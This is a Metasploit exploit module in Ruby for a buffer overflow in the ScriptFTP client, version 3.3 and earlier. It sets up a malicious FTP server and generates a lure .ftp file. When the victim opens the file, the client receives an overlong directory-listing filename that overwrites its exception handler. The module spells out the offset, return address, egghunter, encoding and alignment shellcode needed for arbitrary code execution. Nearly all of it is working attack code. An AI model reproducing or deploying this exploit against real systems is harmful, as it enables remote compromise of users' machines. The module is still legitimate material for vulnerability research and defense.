class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include

1. class Metasploit3 < Msf::Exploit::Remote
2. Rank = GoodRanking
3.  
4. include Msf::Exploit::Remote::FtpServer
5. include Msf::Exploit::FILEFORMAT
6. include Msf::Exploit::Egghunter
7.  
8. def initialize(info = {})
9. super(update_info(info,
10. 'Name' => 'ScriptFTP <= 3.3 Remote Buffer Overflow (LIST)',
11. 'Description' => %q{
12. AmmSoft's ScriptFTP client is susceptible to a remote buffer overflow
13. vulnerability that is triggered when processing a sufficiently long filename during
14. a FTP LIST command resulting in overwriting the exception handler. Social engineering
15. of executing a specially crafted ftp file by double click will result in connecting to
16. our malcious server and perform arbitrary code execution which allows the attacker
17. to gain the same rights as the user running ScriptFTP.
18. },
19. 'License' => MSF_LICENSE,
20. 'Version' => "$Revision: 13841 $",
21. 'Author' =>
22. [
23. 'modpr0be', #Vulnerability discovery and original exploit
24. 'TecR0c <roccogiovannicalvi[at]gmail.com>', # Metasploit module
25. 'mr_me <steventhomasseeley[at]gmail.com>', # Metasploit module
26. ],
27. 'References' =>
28. [
29. #[ 'CVE', '?' ],
30. #[ 'OSVDB', '?' ],
31. [ 'URL', 'http://www.exploit-db.com/exploits/17876/' ],
32. [ 'URL', 'http://www.kb.cert.org/vuls/id/440219' ],
33. ],
34. 'DefaultOptions' =>
35. {
36. 'EXITFUNC' => 'thread',
37. 'DisablePayloadHandler' => 'false',
38. },
39. 'Payload' =>
40. {
41. 'BadChars' => "\x00\xff\x0d\x5c\x2f\x0a",
42. 'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
43. 'EncoderOptions' =>
44. {
45. 'BufferRegister' => 'EDI', # Egghunter jmp edi
46. }
47. },
48. 'Platform' => 'win',
49. 'Targets' =>
50. [
51. # CALL DWORD PTR SS:[EBP-4]
52. # scriptftp.exe - File version=Build 3/9/2009
53. [ 'Windows XP SP3 / Windows Vista', { 'Offset' => 1746, 'Ret' => "\xd6\x41" } ],
54. ],
55. 'Privileged' => false,
56. 'DisclosureDate' => 'Oct 12 2011',
57. 'DefaultTarget' => 0))
58.  
59. register_options(
60. [
61. OptString.new('FILENAME', [ true, 'The file name.', 'msf.ftp']),
62. ], self.class)
63.  
64. end
65.  
66. def setup
67. if datastore['SRVHOST'] == '0.0.0.0'
68. lhost = Rex::Socket.source_address('50.50.50.50')
69. else
70. lhost = datastore['SRVHOST']
71. end
72.  
73. ftp_file = "OPENHOST('#{lhost}','ftp','ftp')\r\n"
74. ftp_file << "SETPASSIVE(ENABLED)\r\n"
75. ftp_file << "GETLIST($list,REMOTE_FILES)\r\n"
76. ftp_file << "CLOSEHOST\r\n"
77.  
78. print_status("Creating '#{datastore['FILENAME']}'...")
79. file_create(ftp_file)
80. super
81. end
82.  
83.  
84. def on_client_unknown_command(c,cmd,arg)
85. c.put("200 OK\r\n")
86. end
87.  
88. def on_client_command_list(c,arg)
89.  
90. conn = establish_data_connection(c)
91. if(not conn)
92. c.put("425 Can't build data connection\r\n")
93. return
94. end
95.  
96. print_status(" - Data connection set up")
97. code = 150
98. c.put("#{code} Here comes the directory listing.\r\n")
99.  
100. code = 226
101. c.put("#{code} Directory send ok.\r\n")
102.  
103. eggoptions =
104. {
105. :checksum => false,
106. :eggtag => 'cure'
107. }
108.  
109. hunter, egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
110.  
111. # Encode with alphamixed, then unicode mixed
112. [ 'x86/alpha_mixed', 'x86/unicode_mixed' ].each { |name|
113. enc = framework.encoders.create(name)
114. if name =~ /unicode/
115. # aligned to ESP & EAX
116. enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
117. else
118. enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EDX' })
119. end
120. # NOTE: we already eliminated badchars
121. hunter = enc.encode(hunter, nil, nil, platform)
122. if name =~/alpha/
123. #insert getpc_stub & align EDX, unicode encoder friendly.
124. #Hardcoded stub is not an issue here because it gets encoded anyway
125. getpc_stub = "\x89\xe1\xdb\xcc\xd9\x71\xf4\x5a\x83\xc2\x41\x83\xea\x35"
126. hunter = getpc_stub + hunter
127. end
128. }
129.  
130. unicode_nop = "\x6d" # DD BYTE PTR DS:[ECX],AL
131.  
132. nseh = "\x61" << unicode_nop
133. seh = target.ret
134.  
135. alignment = "\x54" # PUSH ESP
136. alignment << unicode_nop
137. alignment << "\x58" # POP EAX
138. alignment << unicode_nop
139. alignment << "\x05\x12\x11" # ADD EAX,11001200
140. alignment << unicode_nop
141. alignment << "\x2d\x01\x01" # SUB EAX,1000100
142. alignment << unicode_nop
143. alignment << "\x2d\x01\x10" # SUB EAX,10000100
144. alignment << unicode_nop
145. alignment << "\x50" # PUSH EAX
146. alignment << unicode_nop
147. alignment << "\xc3" # RETN
148.  
149. buffer = rand_text_alpha(656)
150. buffer << hunter
151. buffer << rand_text_alpha(target['Offset']-buffer.length)
152. buffer << nseh
153. buffer << seh
154. buffer << alignment
155. buffer << rand_text_alpha(500)
156. buffer << egg
157.  
158. print_status(" - Sending directory list via data connection")
159. dirlist = "-rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\r\n"
160. dirlist << " 5 ftpuser ftpusers 512 Jul 26 2001 A\r\n"
161. dirlist << "rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\r\n"
162.  
163. conn.put(dirlist)
164. conn.close
165. return
166. end
167.  
168. end
169.  
170.  
171. # [2011-10-09]
172.